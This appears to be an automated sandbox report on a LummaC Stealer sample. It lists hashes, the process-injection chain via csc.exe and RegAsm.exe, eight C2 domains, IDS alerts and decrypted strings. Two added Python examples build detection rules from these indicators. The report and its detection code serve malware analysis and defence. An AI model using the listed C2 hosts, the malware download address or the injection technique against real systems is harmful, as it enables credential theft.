
Windows Analysis Report
htZgRRla8S.exe

Overview

General Information

Sample name: htZgRRla8S.exe (renamed because the original name is a hash value)
Original sample name: b1becdbff2a34334ae4ff5f387115ec3.exe
Analysis ID: 1574065
MD5: b1becdbff2a34334ae4ff5f387115ec3
SHA1: 492305491185a6114ef915ff3b5f705c5facd086
SHA256: c89c8a2ec7d0da083703bd095ba75a8656ae9fd1ffa08b26c8e43d6d04e468c9
Tags: exe, user-abuse_ch

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • htZgRRla8S.exe (PID: 4144 cmdline: "C:\Users\user\Desktop\htZgRRla8S.exe" MD5: B1BECDBFF2A34334AE4FF5F387115EC3)
    • csc.exe (PID: 5996 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 2300 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4E1.tmp" "c:\Users\user\AppData\Local\Temp\qiobmurj\CSCE088865CA7FA428F90DCC973FB284B32.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • RegAsm.exe (PID: 5596 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
Malware configuration (LummaC Stealer): {"C2 url": ["formy-spill.biz", "covery-mover.biz", "se-blurry.biz", "zinc-sneark.biz", "dwell-exclaim.biz", "impend-differ.biz", "dare-curbys.biz", "print-vexer.biz"], "Build id": "DUkgLv--otdel"}
Yara Matches

Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: htZgRRla8S.exe PID: 4144 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

        System Summary

        Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\htZgRRla8S.exe", ParentImage: C:\Users\user\Desktop\htZgRRla8S.exe, ParentProcessId: 4144, ParentProcessName: htZgRRla8S.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline", ProcessId: 5996, ProcessName: csc.exe
        Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\Desktop\htZgRRla8S.exe, ProcessId: 4144, TargetFilename: C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline
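Both Sigma hits above key on the csc.exe command line. The following is an added example, not Joe Sandbox or Sigma rule code, of the same two checks expressed directly over process-creation events: csc.exe or vbc.exe reading a response file from a per-user Temp directory, and a signed .NET utility (RegAsm.exe in this run) started with no arguments at all, which is the process-hollowing pattern behind the later "Creates a process in suspended mode" and "Injects a PE file into a foreign processes" signatures. The events are constructed from the process tree in this report using Sysmon event ID 1 field names; the build-tool allow-list, the set of hollowing targets and the two benign control events are assumptions of the example.

```python
"""Process-creation checks for the csc.exe -> RegAsm.exe chain in this report.

Added example, not Joe Sandbox or Sigma code. SAMPLE_EVENTS is constructed
from the report's process tree (PIDs, images, command lines) using Sysmon
event ID 1 field names; the allow-list of build tools, the set of hollowing
targets and the two benign control events are assumptions of this example.
"""
import ntpath
import re

# Per-user or world-writable locations a compiler response file should not come from (assumed list).
SUSPICIOUS_DIRS = ("/appdata/local/temp/", "/appdata/roaming/", "/users/public/",
                   "/programdata/", "/windows/temp/")
# Parents that legitimately drive csc.exe (assumed allow-list; tune per environment).
BUILD_PARENTS = {"msbuild.exe", "devenv.exe", "dotnet.exe", "vbcscompiler.exe"}
# Signed .NET utilities that .NET loaders start suspended and hollow (assumed set).
HOLLOWING_TARGETS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "applaunch.exe"}


def _image_name(path):
    return ntpath.basename(path.strip('"')).lower()


def _args_after_image(cmdline):
    """Return whatever follows the (possibly quoted) program token."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[end + 1:].strip() if end != -1 else ""
    parts = cmdline.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def check_csc_from_suspicious_location(ev):
    """Same idea as the 'Dynamic .NET Compilation Via Csc.EXE' Sigma hit above."""
    if _image_name(ev["Image"]) not in {"csc.exe", "vbc.exe"}:
        return None
    m = re.search(r'@"([^"]+)"|@(\S+)', ev["CommandLine"])
    if not m:
        return None
    rsp = (m.group(1) or m.group(2)).lower().replace("\\", "/")
    if not any(d in rsp for d in SUSPICIOUS_DIRS):
        return None
    parent = _image_name(ev["ParentImage"])
    if parent in BUILD_PARENTS:
        return None
    return f"compiler response file {rsp} spawned by {parent}"


def check_hollowing_target_without_args(ev):
    """RegAsm/RegSvcs/InstallUtil do nothing useful without arguments."""
    image = _image_name(ev["Image"])
    if image not in HOLLOWING_TARGETS:
        return None
    if _args_after_image(ev["CommandLine"]):
        return None
    return f"{image} started with no arguments by {_image_name(ev['ParentImage'])}"


CHECKS = {
    "csc_from_suspicious_location": check_csc_from_suspicious_location,
    "hollowing_target_without_args": check_hollowing_target_without_args,
}


def scan(events):
    """Run every check over every event; return alerts in event order."""
    alerts = []
    for ev in events:
        for rule, check in CHECKS.items():
            detail = check(ev)
            if detail:
                alerts.append({"pid": ev["ProcessId"], "rule": rule, "detail": detail})
    return alerts


NET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319"
SAMPLE_EVENTS = [
    # Taken from the report's process tree.
    {"ProcessId": 5996, "Image": NET + r"\csc.exe",
     "CommandLine": '"' + NET + r'\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline"',
     "ParentImage": r"C:\Users\user\Desktop\htZgRRla8S.exe"},
    {"ProcessId": 1868, "Image": r"C:\Windows\system32\conhost.exe",
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
     "ParentImage": NET + r"\csc.exe"},
    {"ProcessId": 5596, "Image": NET + r"\RegAsm.exe",
     "CommandLine": '"' + NET + r'\RegAsm.exe"',
     "ParentImage": r"C:\Users\user\Desktop\htZgRRla8S.exe"},
    # Constructed benign controls (not from the report): a real build and a real COM registration.
    {"ProcessId": 7001, "Image": NET + r"\csc.exe",
     "CommandLine": '"' + NET + r'\csc.exe" /noconfig @"C:\src\app\obj\Debug\app.cmdline"',
     "ParentImage": r"C:\Program Files\dotnet\dotnet.exe"},
    {"ProcessId": 7002, "Image": NET + r"\RegAsm.exe",
     "CommandLine": '"' + NET + r'\RegAsm.exe" "C:\Program Files\Vendor\Vendor.dll" /codebase',
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"PID {alert['pid']}: {alert['rule']}: {alert['detail']}")
```

Run stand-alone it reports PID 5996 (the csc.exe compile from Temp) and PID 5596 (RegAsm.exe with an empty argument list) and stays silent on the two control events. The second check is the cheaper of the two to keep in production: csc.exe from Temp has a handful of legitimate sources (PowerShell Add-Type, some installers) that need tuning, while RegAsm.exe with no arguments has essentially none.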

        Data Obfuscation

        Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\htZgRRla8S.exe", ParentImage: C:\Users\user\Desktop\htZgRRla8S.exe, ParentProcessId: 4144, ParentProcessName: htZgRRla8S.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline", ProcessId: 5996, ProcessName: csc.exe

        Suricata IDS Alerts

        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-12-12T21:32:05.359783+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 147.45.44.131 | 80 | TCP
        2024-12-12T21:32:05.574589+0100 | 2800029 | 1 | Attempted User Privilege Gain | 147.45.44.131 | 80 | 192.168.2.5 | 49704 | TCP
        2024-12-12T21:32:06.957951+0100 | 2057981 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 56859 | 1.1.1.1 | 53 | UDP
        2024-12-12T21:32:07.176360+0100 | 2057983 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 59978 | 1.1.1.1 | 53 | UDP
        2024-12-12T21:32:07.412962+0100 | 2057979 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 59092 | 1.1.1.1 | 53 | UDP
        2024-12-12T21:32:07.639261+0100 | 2057977 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 53406 | 1.1.1.1 | 53 | UDP
        2024-12-12T21:32:07.871319+0100 | 2057973 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 59122 | 1.1.1.1 | 53 | UDP
        2024-12-12T21:32:09.569495+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 172.67.206.64 | 443 | TCP
        2024-12-12T21:32:09.569495+0100 | 2057974 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49705 | 172.67.206.64 | 443 | TCP
        2024-12-12T21:32:10.590925+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 172.67.206.64 | 443 | TCP
        2024-12-12T21:32:10.590925+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 172.67.206.64 | 443 | TCP
        2024-12-12T21:32:10.939727+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 172.67.206.64 | 443 | TCP
        2024-12-12T21:32:10.939727+0100 | 2057974 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49706 | 172.67.206.64 | 443 | TCP


        AV Detection

        Source: htZgRRla8S.exe | Avira: detected
        Source: zinc-sneark.biz | URL Reputation: Label: malware
        Source: dwell-exclaim.biz | URL Reputation: Label: malware
        Source: formy-spill.biz | URL Reputation: Label: malware
        Source: https://covery-mover.biz/2 | Avira URL Cloud: Label: malware
        Source: https://covery-mover.biz/apiQ | Avira URL Cloud: Label: malware
        Source: https://covery-mover.biz/ | Avira URL Cloud: Label: malware
        Source: https://covery-mover.biz/apin | Avira URL Cloud: Label: malware
        Source: https://covery-mover.biz/api | Avira URL Cloud: Label: malware
        Source: C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.dll | Avira: detection malicious, Label: HEUR/AGEN.1300034
        Source: 5.2.RegAsm.exe.400000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["formy-spill.biz", "covery-mover.biz", "se-blurry.biz", "zinc-sneark.biz", "dwell-exclaim.biz", "impend-differ.biz", "dare-curbys.biz", "print-vexer.biz"], "Build id": "DUkgLv--otdel"}
        Source: htZgRRla8S.exe | ReversingLabs: Detection: 55%
        Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.dll | Joe Sandbox ML: detected
        Source: htZgRRla8S.exe | Joe Sandbox ML: detected
        Source: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor (one decrypted string per line):
          impend-differ.biz
          print-vexer.biz
          dare-curbys.biz
          covery-mover.biz
          formy-spill.biz
          dwell-exclaim.biz
          zinc-sneark.biz
          se-blurry.biz
          zinc-sneark.biz
          lid=%s&j=%s&ver=4.0
          TeslaBrowser/5.5
          - Screen Resoluton:
          - Physical Installed Memory:
          Workgroup: -
          DUkgLv--otdel
        Source: unknown | HTTPS traffic detected: 172.67.206.64:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: htZgRRla8S.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.pdb | source: htZgRRla8S.exe, 00000000.00000002.2139643170.00000000030D4000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code functions containing 4x inlined nop (function id in parentheses):
          4x nop then movzx edx, byte ptr [esp+ecx+05h] (5_2_0040A960)
          4x nop then mov edx, ecx (5_2_00409CC0)
          4x nop then mov byte ptr [edx], bl (5_2_0040CE55)
          4x nop then mov ebx, dword ptr [edi+04h] (5_2_0042A060)
          4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh] (5_2_00425F7D)
          4x nop then mov edx, ecx (5_2_0041D074)
          4x nop then mov edx, ecx (5_2_0041D087)
          4x nop then mov byte ptr [esi], cl (5_2_0042D085)
          4x nop then mov byte ptr [esi], cl (5_2_0042D085)
          4x nop then movzx ecx, byte ptr [esp+eax+79314A46h] (5_2_00426170)
          4x nop then movzx edi, byte ptr [esi+eax-000000BCh] (5_2_0041597D)
          4x nop then movzx edi, byte ptr [esi+eax-000000BCh] (5_2_00416E97)
          4x nop then mov edi, eax (5_2_00416E97)
          4x nop then mov ebx, eax (5_2_00405910)
          4x nop then mov ebp, eax (5_2_00405910)
          4x nop then cmp dword ptr [ebx+esi*8], B430E561h (5_2_00425920)
          4x nop then mov word ptr [eax], cx (5_2_004286F0)
          4x nop then movzx edi, byte ptr [esi+eax-000000BCh] (5_2_00417190)
          4x nop then mov ecx, eax (5_2_00422270)
          4x nop then mov byte ptr [edi+ebx], 00000000h (5_2_0040C274)
          4x nop then mov eax, dword ptr [00444284h] (5_2_00425230)
          4x nop then mov eax, dword ptr [ebp-10h] (5_2_0043CAC0)
          4x nop then movzx edx, byte ptr [esp+eax+1Ch] (5_2_004292D0)
          4x nop then mov edx, ebx (5_2_004292D0)
          4x nop then add ebp, dword ptr [esp+0Ch] (5_2_0042AAD0)
          4x nop then mov byte ptr [eax], cl (5_2_00415ADC)
          4x nop then push eax (5_2_0040C36E)
          4x nop then movzx ebx, bx (5_2_0042536C)
          4x nop then movzx ebx, byte ptr [ecx+esi] (5_2_00402B70)
          4x nop then mov word ptr [ecx], dx (5_2_00427307)
          4x nop then movzx ebp, word ptr [ecx+ebx*2] (5_2_00436B20)
          4x nop then cmp word ptr [edi+ebx+02h], 0000h (5_2_0043DBD0)
          4x nop then mov eax, dword ptr [ebp-10h] (5_2_0043CBD6)
          4x nop then add eax, dword ptr [esp+ecx*4+24h] (5_2_00407470)
          4x nop then movzx ecx, word ptr [edi+esi*4] (5_2_00407470)
          4x nop then jmp eax (5_2_0042B475)
          4x nop then cmp dword ptr [edi+esi*8], B430E561h (5_2_00419C10)
          4x nop then mov eax, dword ptr [ebp-10h] (5_2_0043CCE0)
          4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh (5_2_0043DCF0)
          4x nop then mov byte ptr [ebx], al (5_2_0042B4BB)
          4x nop then mov eax, dword ptr [ebp-10h] (5_2_0043CD60)
          4x nop then movzx ebx, byte ptr [edx] (5_2_004345F0)
          4x nop then movzx edx, byte ptr [esp+ecx+2Ch] (5_2_00427653)
          4x nop then mov eax, dword ptr [ebp-10h] (5_2_0043CE00)
          4x nop then cmp byte ptr [esi+ebx], 00000000h (5_2_0042A630)
          4x nop then movzx esi, byte ptr [esp+eax+36A27D27h] (5_2_0042C6D7)
          4x nop then mov byte ptr [esi], al (5_2_0042C6D7)
          4x nop then movzx edx, byte ptr [esp+ecx+07540F19h] (5_2_0042C6D7)
          4x nop then movzx edx, byte ptr [esp+ecx+07540F19h] (5_2_0042C6D7)
          4x nop then movzx edx, byte ptr [esp+ecx-41h] (5_2_004296D8)
          4x nop then movzx edi, byte ptr [esi+ecx-000000BCh] (5_2_00415EE0)
          4x nop then mov word ptr [eax], cx (5_2_00421EE0)
          4x nop then cmp al, 2Eh (5_2_004266E7)
          4x nop then mov word ptr [eax], cx (5_2_004286F0)
          4x nop then mov word ptr [eax], dx (5_2_00417E82)
          4x nop then cmp dword ptr [edi+ebp*8], 299A4ECDh (5_2_0043E690)
          4x nop then movzx edi, byte ptr [esi+eax-000000BCh] (5_2_00416E97)
          4x nop then mov edi, eax (5_2_00416E97)
          4x nop then cmp word ptr [ebp+edx+02h], 0000h (5_2_0041CEA5)
          4x nop then add ebx, 03h (5_2_00428F5D)
          4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh] (5_2_00425F7D)
          4x nop then cmp dword ptr [ecx+edx*8], B430E561h (5_2_00414F08)
          4x nop then mov ecx, edx (5_2_00414F08)
          4x nop then mov word ptr [eax], cx (5_2_00420717)
          4x nop then mov word ptr [ecx], dx (5_2_00420717)
          4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah] (5_2_0042BFD3)
          4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah] (5_2_0042BFDA)
          4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h (5_2_0043DFB0)

        Networking

        Source: Network traffic | Suricata IDS: 2057931 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.5:53406 -> 1.1.1.1:53
        Source: Network traffic | Suricata IDS: 2057977 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.5:53406 -> 1.1.1.1:53
        Source: Network traffic | Suricata IDS: 2057925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.5:59122 -> 1.1.1.1:53
        Source: Network traffic | Suricata IDS: 2057973 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.5:59122 -> 1.1.1.1:53
        Source: Network traffic | Suricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.5:49706 -> 172.67.206.64:443
        Source: Network traffic | Suricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.5:49706 -> 172.67.206.64:443
        Source: Network traffic | Suricata IDS: 2057926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.5:49705 -> 172.67.206.64:443
        Source: Network traffic | Suricata IDS: 2057974 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) : 192.168.2.5:49705 -> 172.67.206.64:443
        Source: Network traffic | Suricata IDS: 2057949 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.5:56859 -> 1.1.1.1:53
        Source: Network traffic | Suricata IDS: 2057981 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.5:56859 -> 1.1.1.1:53
        Source: Network traffic | Suricata IDS: 2057945 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.5:59978 -> 1.1.1.1:53
        Source: Network traffic | Suricata IDS: 2057983 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.5:59978 -> 1.1.1.1:53
        Source: Network traffic | Suricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 147.45.44.131:80 -> 192.168.2.5:49704
        Source: Network traffic | Suricata IDS: 2057929 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.5:59092 -> 1.1.1.1:53
        Source: Network traffic | Suricata IDS: 2057979 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.5:59092 -> 1.1.1.1:53
        Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 172.67.206.64:443
        Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.206.64:443
        Source: Malware configuration extractor | URLs: formy-spill.biz, covery-mover.biz, se-blurry.biz, zinc-sneark.biz, dwell-exclaim.biz, impend-differ.biz, dare-curbys.biz, print-vexer.biz
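The ET signatures above fired for five of the eight configured C2 domains; impend-differ.biz, dare-curbys.biz and print-vexer.biz appear only in the extracted configuration and the decrypted strings, never in this run's DNS traffic. The following is an added example, not Joe Sandbox or Emerging Threats code, that turns the extracted configuration into local Suricata rules for every configured domain and matches the same list against Suricata EVE JSON records. The configuration is the one recovered above; the local SID range and the EVE sample lines (modelled on this run's HTTP, DNS and TLS events) are constructed for the example.

```python
"""Turn the LummaC configuration into Suricata rules and an EVE log matcher.

Added example, not Joe Sandbox or Emerging Threats code. LUMMA_CONFIG is the
configuration the report's extractor recovered; the local SID range and the
SAMPLE_EVE lines (modelled on this run's HTTP, DNS and TLS events) are
constructed for the example.
"""
import json

LUMMA_CONFIG = {
    "C2 url": ["formy-spill.biz", "covery-mover.biz", "se-blurry.biz", "zinc-sneark.biz",
               "dwell-exclaim.biz", "impend-differ.biz", "dare-curbys.biz", "print-vexer.biz"],
    "Build id": "DUkgLv--otdel",
}


def suricata_rules(domains, base_sid=9000000):
    """One dns.query rule and one tls.sni rule per C2 domain (local SID range assumed).

    'endswith' makes the match cover subdomains as well as the bare domain.
    """
    rules = []
    sid = base_sid
    for domain in domains:
        rules.append(
            f'alert dns any any -> any any (msg:"LOCAL LummaC C2 domain in DNS lookup ({domain})"; '
            f'dns.query; content:"{domain}"; nocase; endswith; classtype:domain-c2; sid:{sid}; rev:1;)')
        sid += 1
        rules.append(
            f'alert tls $HOME_NET any -> $EXTERNAL_NET any (msg:"LOCAL LummaC C2 domain in TLS SNI ({domain})"; '
            f'tls.sni; content:"{domain}"; nocase; endswith; classtype:domain-c2; sid:{sid}; rev:1;)')
        sid += 1
    return rules


def _observed_name(ev):
    """The host name an EVE record carries, by event type (None if it has none)."""
    kind = ev.get("event_type")
    if kind == "dns":
        return ev.get("dns", {}).get("rrname")
    if kind == "tls":
        return ev.get("tls", {}).get("sni")
    if kind == "http":
        return ev.get("http", {}).get("hostname")
    return None


def match_eve(eve_text, domains):
    """Return (timestamp, event_type, observed name, matched C2 domain) for every hit."""
    wanted = [d.lower() for d in domains]
    hits = []
    for line in eve_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        name = _observed_name(ev)
        if not name:
            continue
        name = name.lower().rstrip(".")
        for c2 in wanted:
            if name == c2 or name.endswith("." + c2):
                hits.append((ev["timestamp"], ev["event_type"], name, c2))
                break
    return hits


# Constructed EVE JSON lines modelled on the traffic in this report (not Suricata output from the run).
SAMPLE_EVE = "\n".join(json.dumps(e) for e in [
    {"timestamp": "2024-12-12T21:32:05.359783+0100", "event_type": "http", "src_ip": "192.168.2.5",
     "dest_ip": "147.45.44.131", "dest_port": 80,
     "http": {"hostname": "147.45.44.131", "url": "/infopage/ung0.exe", "http_method": "GET"}},
    {"timestamp": "2024-12-12T21:32:07.871319+0100", "event_type": "dns", "src_ip": "192.168.2.5",
     "dest_ip": "1.1.1.1", "dns": {"type": "query", "rrname": "covery-mover.biz", "rrtype": "A"}},
    {"timestamp": "2024-12-12T21:32:08.000000+0100", "event_type": "dns", "src_ip": "192.168.2.5",
     "dest_ip": "1.1.1.1", "dns": {"type": "query", "rrname": "www.microsoft.com", "rrtype": "A"}},
    {"timestamp": "2024-12-12T21:32:09.569495+0100", "event_type": "tls", "src_ip": "192.168.2.5",
     "dest_ip": "172.67.206.64", "dest_port": 443,
     "tls": {"sni": "covery-mover.biz", "version": "TLS 1.2", "ja3": {"hash": "a0e9f5d64349fb13191bc781f81f42e1"}}},
])

if __name__ == "__main__":
    print("\n".join(suricata_rules(LUMMA_CONFIG["C2 url"])))
    for hit in match_eve(SAMPLE_EVE, LUMMA_CONFIG["C2 url"]):
        print(hit)
```

The rules duplicate what ET's 2057925/2057926-style signatures already did for the five domains that were resolved during the run; their value is the other three, and any future configuration dump, which can be fed through the same function without waiting for a vendor update. The matcher deliberately ignores the download host 147.45.44.131: it is a bare IP with no DNS lookup (see the "TCP traffic detected without corresponding DNS query" entries below), so it is a separate IP indicator rather than a domain one.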
        Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
          Date: Thu, 12 Dec 2024 20:32:05 GMT
          Server: Apache/2.4.52 (Ubuntu)
          Last-Modified: Tue, 10 Dec 2024 18:22:16 GMT
          ETag: "48e00-628ee8f9c1375"
          Accept-Ranges: bytes
          Content-Length: 298496
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: application/x-msdos-program
          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 ae 00 00 00 00 00 00 f0 87 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e1 0b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 78 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 